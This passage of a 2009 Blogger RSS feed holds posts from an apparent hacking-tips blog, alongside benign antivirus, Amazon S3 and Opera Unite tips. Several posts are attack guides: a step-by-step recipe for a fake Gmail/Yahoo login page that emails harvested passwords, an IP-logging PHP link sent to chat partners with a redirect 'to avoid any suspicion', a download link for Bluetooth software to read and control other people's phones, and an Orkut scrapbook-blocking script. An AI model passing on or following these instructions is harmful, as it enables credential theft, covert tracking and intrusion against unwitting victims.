display: block; text-align: center; cursor: pointer; width: 124px; height: 93px;" src="http://3.bp.blogspot.com/_fMrF3L8CTmg/SqI-H3EngYI/AAAAAAAAAHA/tQSSr3sp5I4/s320/images.jpg" alt="" id="BLOGGER_PHOTO_ID_5377929209797116290" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;IS your PC infected by virus,spyware etc?,Does your pc much  takes time to start?,Are you looking for tools to &lt;span style="font-weight: bold;"&gt;fix up your infected computer&lt;/span&gt; then this post is just for you,&lt;br /&gt;I get this question getting asked frequently,"&lt;span style="font-weight: bold;"&gt;How to fix your infected computer&lt;/span&gt;",I have posted here  many ways to &lt;span style="font-weight: bold;"&gt;fix your infected computer&lt;/span&gt; and Make it start faster&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;h1&gt;How to fix you infected computer&lt;/h1&gt;&lt;br /&gt;&lt;br /&gt;Here are some steps you need to take when fixing your infected computer:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Antivirus software&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1.&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/09/www.kaspersky.com"&gt;Kaspersky:&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;It is one of the best antivirus availible on web,Kaspersky Anti-Virus features include real-time protection, detection and removal of viruses, trojans, worms, spyware, adware, keyloggers malicious tools and Auto-Dialers, as well as detection and removal of rootkits. It also includes instantaneous automatic updates via the "Kaspersky Security Network" service.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2&lt;/span&gt;.&lt;a href="http://www.avira.com/en/download/index.html"&gt;Avira &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Avira uses very less CPU and is quite compact.Avira free is much better than Avira Premium even though it offers web filter and mail filter&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3.&lt;/span&gt;&lt;a href="http://www.avg.com/download-trial"&gt;AVG&lt;/a&gt;&lt;br /&gt;AVG is one of the most used antiviruses now a days,most of all its free and antispyware too,It is very light and does not acquire too much disk space&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;4.&lt;/span&gt;&lt;a href="http://www.symantec.com/redirects/norton/norton_com/"&gt;Norton&lt;/a&gt;&lt;br /&gt;Quite slow if you have a 512 MB or 1GB RAM.2GB and 3 GB RAM Users are only advised to use this software.But it is extremely good in virus detection and does not leave a single trace of any damage,It detects 90% of viruses but not better than kaspersky.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Antispyware:&lt;/h3&gt;&lt;br /&gt;&lt;br /&gt;Spyware is a type of malware that is installed on computers and that collects information about users without their knowledge. The presence of spyware is typically hidden from the user. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.&lt;br /&gt;&lt;br /&gt;Antispware is the second step in to &lt;span style="font-weight: bold;"&gt;fix your infected computer&lt;/span&gt;.Running anti-spyware software has become a widely recognized element of computer security practices for computers, especially those running Microsoft Windows. A number of jurisdictions have passed anti-spyware laws, which usually target any software that is surreptitiously installed to control a user's computer&lt;br /&gt;&lt;br /&gt;Here is a list of some antispywares which i would recommend:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1.&lt;/span&gt;&lt;a href="http://en.seguridadpc.net/antispam/Ad-Aware_Personal_Edition.htm"&gt;Ad-Aware Free Anniversary Edition 8.0.7:&lt;/a&gt;&lt;br /&gt;It eliminates spy archives and him easily aid to eliminate them of fast form. It can choose the modules to eliminate, to keep files from registry, and to personalize the menu of the program&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2.&lt;/span&gt;&lt;a href="http://en.seguridadpc.net/antispyware/Asquared_Free.htm"&gt;a-squared Free 4.5.0.8:&lt;/a&gt;&lt;br /&gt;Also known like a², one specializes in detecting, to eliminate malwares (all type of harmful file). To the day of today, a-squared detects and eliminates more of: 24.000 trojans, 67.000 worms, 40.000 dialers, 11.000 spyware y 70.000 plans or signs.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;3&lt;/span&gt;.&lt;a href="http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html"&gt;Malwarebytes Anti-Malware:&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This antispy analyzes the discs in search of malware With option to eliminating them. This antispy can be programmed to analyze PC at a certain hour. It has a list for files in quarantine and to ignoring. There exists the possibility of activating the protection in real time (Itdetects the threats before that enter to the system), which, it is of payment.&lt;br /&gt;&lt;br /&gt;Others are such as spyware blaster,spy defence etc&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Registry scanner:&lt;/h3&gt;&lt;br /&gt;Next you need a registry scanner, to &lt;span style="font-weight: bold;"&gt;fix your infected computer&lt;/span&gt;,Viruses often copy their algorithm into the registry entry.So you are only 50% done after you delete the virus)&lt;br /&gt;Well there are many registry cleaners availible such as&lt;br /&gt;&lt;br /&gt;1.&lt;a href="http://www.eusing.com/free_registry_cleaner/registry_cleaner.htm"&gt;Eusing Free Registry Cleaner/scanner&lt;/a&gt;&lt;br /&gt;2.&lt;a href="http://www.registryfix.com/"&gt;Registry fix&lt;/a&gt;&lt;br /&gt;3.&lt;a href="http://download.cnet.com/Auslogics-Registry-Cleaner/3000-2094_4-10909814.html"&gt;Auslogics registry cleaner&lt;/a&gt;(My recommendation)&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Trojan horse removal:&lt;/h4&gt;&lt;br /&gt;&lt;br /&gt;For this you can read my post on "&lt;a href="http://rafayhackingarticles.blogspot.com/2009/05/find-trojan-horse-in-minute-and-get-rid.html"&gt;Trojan horse removal&lt;/a&gt;"&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/09/www.ccleaner.com"&gt;Ccleaner&lt;/a&gt;:&lt;/h3&gt;&lt;br /&gt;After that you can download CCleaner and optimize your computer speed by deleting unwanted registry and internet tracing cookies and temporary files.&lt;br /&gt;&lt;br /&gt;&lt;h5&gt;Bonus:&lt;/h5&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Anti-Malware Toolkit&lt;/span&gt; - a program that automatically downloads all of the recommended programs to help users clean their computers and have them running at peak performance again.&lt;br /&gt;&lt;br /&gt;Help keep your computer safe, secure and clean from malware - get the Anti-Malware Toolkit today!&lt;br /&gt;&lt;br /&gt;Download anti malware tool kit &lt;a href="http://download.famouswhy.com/anti_malware_toolkit/"&gt;here&lt;/a&gt;&lt;/span&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/how-to-fix-your-infected-computer.html</link><author>noreply@blogger.com (AJEET)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/_fMrF3L8CTmg/SqI-H3EngYI/AAAAAAAAAHA/tQSSr3sp5I4/s72-c/images.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-7443677743892897340</guid><pubDate>Wed, 16 Sep 2009 02:13:00 +0000</pubDate><atom:updated>2009-09-15T19:14:25.005-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>How to Trace ip address of remote computer</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fMrF3L8CTmg/Sq6CaRkXuEI/AAAAAAAAAIA/FlnwWPAsBUI/s1600-h/ip.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 150px; height: 200px;" src="http://1.bp.blogspot.com/_fMrF3L8CTmg/Sq6CaRkXuEI/AAAAAAAAAIA/FlnwWPAsBUI/s320/ip.jpg" alt="Trace ip address" id="BLOGGER_PHOTO_ID_5381381992658483266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Most of you may be curious to know how to trace the IP address of a remote computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk or msn.In this post I will tell you &lt;span style="font-weight: bold;"&gt;How to trace ip address of a remote computer&lt;/span&gt;,Well i had been asked this question for a long period and many of users have requested me make a post on &lt;span style="font-weight: bold;"&gt;How to trace ip address on a remote computer&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;How to trace ip address - Method&lt;/h1&gt;&lt;br /&gt;&lt;br /&gt;1. Download the &lt;a href="http://www.ziddu.com/download/6490487/FakeLoginHi5rafayhackingarticles.blogspot.com.rar.html"&gt;IP Finder script&lt;/a&gt; (IP_Finder.ZIP) that I have created.&lt;br /&gt;&lt;br /&gt;2. Create an account on &lt;a href="http://www.110mb.com/"&gt;110mb&lt;/a&gt;,&lt;a href="http://www.ripway.com/"&gt;ripway&lt;/a&gt;,&lt;a href="http://www.t35.com/"&gt;t35&lt;/a&gt;(or any free host that supports PHP).&lt;br /&gt;&lt;br /&gt;3. Extract the IP_Finder.ZIP file and upload the two files &lt;span style="font-weight: bold;"&gt;ip.php&lt;/span&gt; and &lt;span style="font-weight: bold;"&gt;ip_log.txt&lt;/span&gt; into the root folder of your hosting account using the File Manager.&lt;br /&gt;&lt;br /&gt;4. You can rename the &lt;span style="font-weight: bold;"&gt;ip.php&lt;/span&gt; to any name of your choice.&lt;br /&gt;&lt;br /&gt;5. Set the permission to 777 on ip_log.txt.&lt;br /&gt;&lt;br /&gt;Now you are all set to &lt;span style="font-weight: bold;"&gt;trace the IP address of a remote computer&lt;/span&gt; of your choice. All you have to do is send the link of &lt;span style="font-weight: bold;"&gt;ip.php &lt;/span&gt;to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file &lt;span style="font-weight: bold;"&gt;ip_log.txt.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;For your better understanding let’s take up the following example.&lt;br /&gt;&lt;br /&gt;Suppose you open a new account in 110mb.com with the subdomain as &lt;span style="font-weight: bold;"&gt;123&lt;/span&gt;, then your IP Finder link would be&lt;br /&gt;&lt;br /&gt;http://123.110mb.com/ip.php&lt;br /&gt;&lt;br /&gt;You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.&lt;br /&gt;&lt;br /&gt;To find the recorded IP address check the logs using the following link.&lt;br /&gt;&lt;br /&gt;http://123.110mb.com/ip_log.php&lt;br /&gt;&lt;br /&gt;The sample log will be in the following format&lt;br /&gt;&lt;br /&gt;101.92.133.233 Friday 07th of sep 2009 07:31:27 PM&lt;br /&gt;45.45.144.237  Friday 07th of sep 2009 07:31:28 PM&lt;br /&gt;123.44.144.233 Friday 07th of sep 2009 07:31:31 PM&lt;br /&gt;&lt;br /&gt;NOTE: You have to replace abc with your subdomain name.&lt;br /&gt;&lt;br /&gt;I hope this helps,Please express your thoughts by commenting&lt;/span&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/how-to-trace-ip-address-of-remote.html</link><author>noreply@blogger.com (AJEET)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/_fMrF3L8CTmg/Sq6CaRkXuEI/AAAAAAAAAIA/FlnwWPAsBUI/s72-c/ip.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-5014479642421943589</guid><pubDate>Wed, 16 Sep 2009 02:12:00 +0000</pubDate><atom:updated>2009-09-15T19:13:27.244-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><title>How to hack cellfones</title><description>In this post you will learn that what it takes for &lt;span style="font-weight: bold;"&gt;"How to hack cellfones&lt;/span&gt;" and find out what others are doing.Well Most of the people are curious about "&lt;span style="font-weight: bold;"&gt;How to hack cellfones"&lt;/span&gt;,Well today i will tell procedure for to &lt;span style="font-weight: bold;"&gt;hack cell fones&lt;/span&gt;.Friends here is a bluetooth hacking software ,using bluetooth hacking software u can "&lt;span style="font-weight: bold;"&gt;hack any cell phones&lt;/span&gt;" this software is the latest version Bluetooth Hack v 1.07. &lt;a href="http://rapidshare.com/files/36540647/Superbluetoothhack.zip"&gt;click here&lt;/a&gt; to download.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Advantages of this software.&lt;br /&gt;Once if ur connected to another phone via bluetooth you can:&lt;br /&gt;- you can read his/her messagess&lt;br /&gt;- you can read his/her contacts&lt;br /&gt;- you can change hi/her profile&lt;br /&gt;- you can also play his/her ringtones even his/her phone is in silent&lt;br /&gt;- you can play his songs from his/her mobile&lt;br /&gt;- you can restart his/her mobile&lt;br /&gt;- you can switch off his/her mobile&lt;br /&gt;- u can restore his/her factory setings&lt;br /&gt;- you can also change ringing volume of his/her mobile..&lt;br /&gt;- the best part of it is u can call from his mobile which also includes all call functions like hold on etc etc..&lt;br /&gt;&lt;span style="color:#663399;"&gt;&lt;span style="font-weight: bold;"&gt;Mobile phone hacking&lt;/span&gt; will only work if you follow the steps correctly&lt;br /&gt;This software is very much suitable for sony ericcsson mobiles.&lt;br /&gt;If u like it replies are always welcome.&lt;/span&gt;&lt;/span&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/how-to-hack-cellfones.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-8069694725330844913</guid><pubDate>Wed, 16 Sep 2009 02:11:00 +0000</pubDate><atom:updated>2009-09-15T19:12:03.665-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><title>How to create Fake login page for any website</title><description>&lt;span class="fullpost"&gt;Now it's easy to build a Fake Login Pages without any knowledge of Programming Languages. One can use &lt;a href="http://www.jotform.com/"&gt;&lt;span style="color:#ff0000;"&gt;http://www.jotform.com&lt;/span&gt;&lt;/a&gt; to build the Sign Up page.&lt;br /&gt;&lt;br /&gt;{1} Open www.jotform.com and Sign Up.&lt;br /&gt;{2} then Login there with your newly registered account.&lt;br /&gt;{3} now click on ‘ Create your first form’.&lt;br /&gt;{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)&lt;br /&gt;{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)&lt;br /&gt;{6} Now Click on ‘Power Tool’ Option (In right hand side…)&lt;br /&gt;{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’&lt;br /&gt;{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.&lt;br /&gt;{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.&lt;br /&gt;{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username &amp;amp; password, user will get redirect to this url.(Don’t leave it blank…)&lt;br /&gt;{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.&lt;br /&gt;{12} Now you can see two Options, namely ‘Option1′ &amp;amp; ‘Option2′. Copy the full code of ‘Option2′.&lt;br /&gt;{13} Now open Notepad text editor and write the following code their.&lt;br /&gt;Paste the Option2 code here&lt;br /&gt;{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.&lt;br /&gt;Now you can view it by typing the url in the address bar.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#663399;"&gt;NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.&lt;br /&gt;I suppose that you created your account at 110mb.com&lt;br /&gt;now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.&lt;br /&gt;Now you can access you file on the net by just typing the url ofthe file.&lt;br /&gt;And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Thats how you can &lt;strong&gt;create fake login page&lt;/strong&gt; for your desired site,hope you enjoyed the post&lt;br /&gt;&lt;span style="color:#663399;"&gt;Warning:Hacking is a Crime&lt;/span&gt;&lt;/span&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/how-to-create-fake-login-page-for-any.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-5517276889111482850</guid><pubDate>Wed, 16 Sep 2009 02:08:00 +0000</pubDate><atom:updated>2009-09-15T19:10:35.515-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><title>Hacking Orkut</title><description>Learn to &lt;strong&gt;block your friends scrapbook in orkut&lt;/strong&gt;&lt;br /&gt;It will be really scary when you will find out that you are not able to reply to your friends scrap from your own scrapbook. Yes this hack can be used to block anybody’s scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him.&lt;br /&gt;&lt;br /&gt;Now to &lt;span style="font-weight: bold;"&gt;block your freinds scrapbook&lt;/span&gt;,You just need t paste the below code in your friends scrapbook.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/download/6517852/Scriptbyrafayhackingarticles.rar.html"&gt;Download the script&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;1.Victim cannot open his/her scrapbook,Whenever he will open his/her scrapbook he will be redirected to login sceen.&lt;br /&gt;&lt;br /&gt;2.After this Whenever anybody will enter his scrapbook he will be Redirected to his Login Screen.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Solution : (To Unblock it)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;To avoid being logged off again when you see the scrap, you can block flash in your browser.&lt;br /&gt;&lt;br /&gt;For Firefox download the following plugin :&lt;br /&gt;&lt;br /&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/433"&gt;Download the plugin&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In opera, you can disable the flash plugin.&lt;br /&gt;&lt;br /&gt;Now this will only allow you to enter the scrapbook but your friends will still not be able to scrap you. So for that you need to delete the scrap.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Another Method:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;First open your scrapbook.&lt;br /&gt;&lt;br /&gt;Now Open your Orkut Homepage in a new window( Don't close the scrapbook ). You will find the login page.&lt;br /&gt;&lt;br /&gt;Now enter your detail and login to Orkut.&lt;br /&gt;&lt;br /&gt;After being logged in delete the scrap from the scrapbook page that you had kept open.</description><link>http://123mycomputer.blogspot.com/2009/09/hacking-orkut.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-6623322522135653023</guid><pubDate>Wed, 16 Sep 2009 02:07:00 +0000</pubDate><atom:updated>2009-09-15T19:08:54.002-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Amazon S3 Hosting Tips You Should Know About</title><description>&lt;p&gt;If you using &lt;a title="Stories about Amazon S3 on Digital Inspiration" href="http://digitalinspiration.com/amazon-s3"&gt;Amazon S3&lt;/a&gt; (or CloudFront) for your web hosting needs, here are some essential tips that you should know about.&lt;/p&gt; &lt;p&gt;The tips discussed here will also help reduce your monthly S3 bandwidth (thus saving you money) and you don’t have to be "technical guru" to implement them. There are a couple of good &lt;a href="http://www.labnol.org/internet/amazon-s3-clients-roundup/8286/"&gt;S3 file managers&lt;/a&gt; that provide a visual interface to manage S3 though my personal favorite is &lt;a href="http://s3explorer.cloudberrylab.com/"&gt;CloudBerry Explorer&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Tip #1: Are people misusing your S3 files&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Amazon S3’s bandwidth rates are inexpensive and you pay for what you use. The problem is that if other websites are hot-linking to your S3 hosted content (like images, MP3s, Flash videos, etc.),  you’ll also have to pay for bandwidth consumed by these sites.&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline;" title="s3 log file" alt="s3 log file" src="http://img.labnol.org/di/s3logging.png" width="536" border="0" height="303" /&gt;&lt;/p&gt; &lt;p&gt;Unlike Apache web servers where you can easily prevent hot-linking through .htaccess files, Amazon S3 offers no such mechanism but what you can do is enable logging for all your S3 buckets. Amazon will then log all client requests in log files that you can parse in Excel to know about sites misusing your content.&lt;/p&gt; &lt;p&gt;Send the owner &lt;a title="How to Find Email Address of People" href="http://labnol.blogspot.com/2007/09/how-to-find-email-addresses-of-people.html"&gt;an email&lt;/a&gt; or simply change the name /location of your S3 object and update your web templates to reflect the new web address.&lt;/p&gt; &lt;p&gt;&lt;em&gt;How to Implement &lt;/em&gt;- Create a new S3 bucket to store your logs. Now right-click the bucket name and choose "Logging".&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Tip #2: Create Time Limited Links&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;By default, all public files in your S3 account are available for download forever until you delete the file or change the permissions.&lt;/p&gt; &lt;p&gt;However, if you are running some sort of contest on your site where you are giving away a PDF ebook or some MP3 ringtone to your visitors, it doesn’t make sense to have those file live on your S3 server beyond the duration of the contest.&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline;" title="expire files after a time period" alt="expire files after a time period" src="http://img.labnol.org/di/expirefiles.png" width="539" border="0" height="101" /&gt;&lt;/p&gt; &lt;p&gt;You should therefore consider creating "signed URLs" for such temporary S3 files – these are time limited URLs that are valid for a specific time period and expire afterwards (or return 404s).&lt;/p&gt; &lt;p&gt;&lt;em&gt;How to Implement&lt;/em&gt; – Right click a file in the S3 bucket, choose Web URL and then set a Expiry Time. Click Generate to created a "signed URL".&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Tip #3: &lt;/strong&gt;&lt;strong&gt;Use Amazon S3 without a Domain Name&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;It’s a common myth that you need to have a domain in order to host files on Amazon S3. That’s not true.&lt;/p&gt; &lt;p&gt;Simply create a new bucket on Amazon S3, set the file access to public and Amazon will provide you with a public URL which is something of the form bucketname.s3.amazonaws.com/filename&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Tip #4: Set Expiry Headers for Static Images&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;It is important that you add an an Expires or a Cache-Control HTTP Header for static content on your site like images, Flash files, multimedia or any other content that doesn’t change with time. For a more detailed explanation, please see this post on how to &lt;a href="http://www.labnol.org/internet/lower-amazon-s3-bill-improve-website-loading-time/5193/"&gt;improve website loading time with S3&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;The gist is that all web browsers store objects in their cache and this Expires header in the HTTP response tells the browser how long that object should stay in the cache. So if it’s a static image, you can set the Expires date sometime in future and client browser won’t request the object again if the same visitor views another page on your site.&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline;" title="expires http header" alt="expires http header" src="http://img.labnol.org/di/httpheader.png" width="488" border="0" height="398" /&gt;&lt;/p&gt; &lt;p&gt;&lt;em&gt;How to Implement&lt;/em&gt; – To set an expires header, right click the S3 object properties, choose HTTP headers and add a new header. Call it "Expires" and set an expiration date like "Tue, 12 Apr 2010 01:00:00 GMT".&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Tip #5: Use BitTorrent Delivery for large files&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;If you are planning to distribute some large files of the web (like a software installer or some database dump) via Amazon S3, it makes to sense to use BitTorrent with S3 so that you don’t necessarily have to pay for all the download bandwidth.&lt;/p&gt; &lt;p&gt;Each client will then download some part of the file from your Amazon &lt;acronym&gt;S3&lt;/acronym&gt; ("seeder") and some part from other torrent clients, while simultaneously uploading pieces of the same file to other interested "peers." Thus your overall cost for distributing that file on the web get lowered.&lt;/p&gt; &lt;p&gt;The starting point for a BitTorrent download is a .torrent file and you can quickly create a .torrent file to any S3 object by adding "?torrent" to the original web URL.&lt;/p&gt; &lt;p&gt;For instance, if the original S3 object URL is ..&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:courier;font-size:85%;color:#008040;"&gt;http://labnol.s3.amazonaws.com/software-installer.zip&lt;/span&gt;&lt;/p&gt; &lt;p&gt;..the torrent file for that object will be&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:courier;font-size:85%;color:#008040;"&gt;http://labnol.s3.amazonaws.com/software-installer.zip&lt;strong&gt;?torrent&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;Later, if you want to prevent distributing that file via BitTorrent, simply remove anonymous access to it or delete the file from the S3 bucket.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Tip #6: Block Google &amp;amp; search bots&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;To prevent bots from indexing files stored in your Amazon S3 buckets, create a robots.txt file at the root and it should say:&lt;/p&gt; &lt;pre&gt;User-agent: *&lt;br /&gt;Disallow: /&lt;/pre&gt; &lt;p&gt;Make sure that you update the ACL (or access permissions) to public else spiders won’t find your robots.txt file.&lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/amazon-s3-hosting-tips-you-should-know.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-7942616437374338552</guid><pubDate>Wed, 16 Sep 2009 02:07:00 +0000</pubDate><atom:updated>2009-09-15T19:07:38.822-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Computer</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Turn Your Home Computer into a Web Server in 2 Minutes</title><description>Before getting into the actual process, let’s look at a couple of &lt;strong&gt;real-world situations that explain why you may want to turn your home computer into a web server&lt;/strong&gt;. &lt;p&gt;&lt;strong&gt;Situation #1&lt;/strong&gt;. Say you have music MP3s, documents and other important files on the hard drive of your home computer. If you turn this home computer into a web server, you will be able to access all these files from office or any other Internet connected machine including your mobile phone.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Situation #2&lt;/strong&gt;. You have some personal photographs that you want to share with other family members. You can either upload these pictures online to a site like Flickr or better still, just convert the computer into a web server. Now you can connect the camera to the computer, transfer the digital pictures to some designated folder and they’ll instantly become available to your friends and family anywhere in the world.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Situation #3&lt;/strong&gt;. You want to host a website on the internet but the web hosting jargon like FTP, DNS, etc. is way too complex for you. The workaround therefore is that you setup a web server on your home computer (it’s easy) and then host a website in seconds without spending a single penny on external web hosting services.&lt;/p&gt; &lt;p&gt;Now if any of the above reasons look convincing enough, here’s how you can convert your Windows, Mac or Linux PC into a web server in less than two minutes – no technical knowledge required.&lt;/p&gt; &lt;p&gt;Go to &lt;a href="http://labs.opera.com/downloads/"&gt;labs.opera.com&lt;/a&gt;, download the Opera Unite software and install it. Congratulations, you are now running a web server on your machine and just need another minute to configure local file folders that you want to share with others over the internet.&lt;/p&gt; &lt;p&gt;Here’s an illustrated screenshot of the configuration panel – nothing technical here again.&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline;" title="webserver" src="http://img.labnol.org/di/webserver.png" alt="webserver" width="535" border="0" height="308" /&gt;&lt;/p&gt; &lt;p&gt;Start the Opera Web browser (yes, that’s also you web server now) and enable the Opera Unite service from the lower left corner. Now double click the File Sharing link and select the folder whose content you want to share on the web. Any file or folder inside this folder can now be accessed over the internet – you can either use a public URL or specify a password for private sharing.&lt;/p&gt; &lt;p&gt;The following screencast video has more detailed instructions on how to get started with Opera Unite or you may refer to the &lt;a title="http://unite.opera.com/support/userguide/" href="http://unite.opera.com/support/userguide/"&gt;User Guide&lt;/a&gt; if you get stuck somewhere.&lt;/p&gt; &lt;p&gt;&lt;object data="http://www.youtube.com/v/-omonwFkkrY&amp;amp;hl=en&amp;amp;fs=1&amp;amp;rel=0&amp;amp;showsearch=0&amp;amp;showinfo=0&amp;amp;hd=1" type="application/x-shockwave-flash" width="530" height="380"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;param name="src" value="http://www.youtube.com/v/-omonwFkkrY&amp;amp;hl=en&amp;amp;fs=1&amp;amp;rel=0&amp;amp;showsearch=0&amp;amp;showinfo=0&amp;amp;hd=1"&gt;&lt;param name="allowfullscreen" value="true"&gt;&lt;/object&gt;&lt;/p&gt; &lt;p&gt;Opera Unite looks pretty useful but there are other services around that can also do pretty similar stuff. For instance, both &lt;a href="http://labnol.blogspot.com/2007/05/share-pictures-documents-music-on-web.html"&gt;PurpleNova&lt;/a&gt; and &lt;a href="http://labnol.blogspot.com/2007/06/share-pictures-directly-from-your.html"&gt;Dekoh Dekstop&lt;/a&gt; enable users share content on the Internet directly from the hard drive without having to upload it anywhere.&lt;/p&gt; Update: It’s important to note that your computer must be in running state and also connected to the Internet for others to download files and web pages since Opera Unite streams content directly from your machine – it doesn’t upload or caches anything to its own</description><link>http://123mycomputer.blogspot.com/2009/09/turn-your-home-computer-into-web-server.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-3071958668640550237</guid><pubDate>Wed, 16 Sep 2009 02:04:00 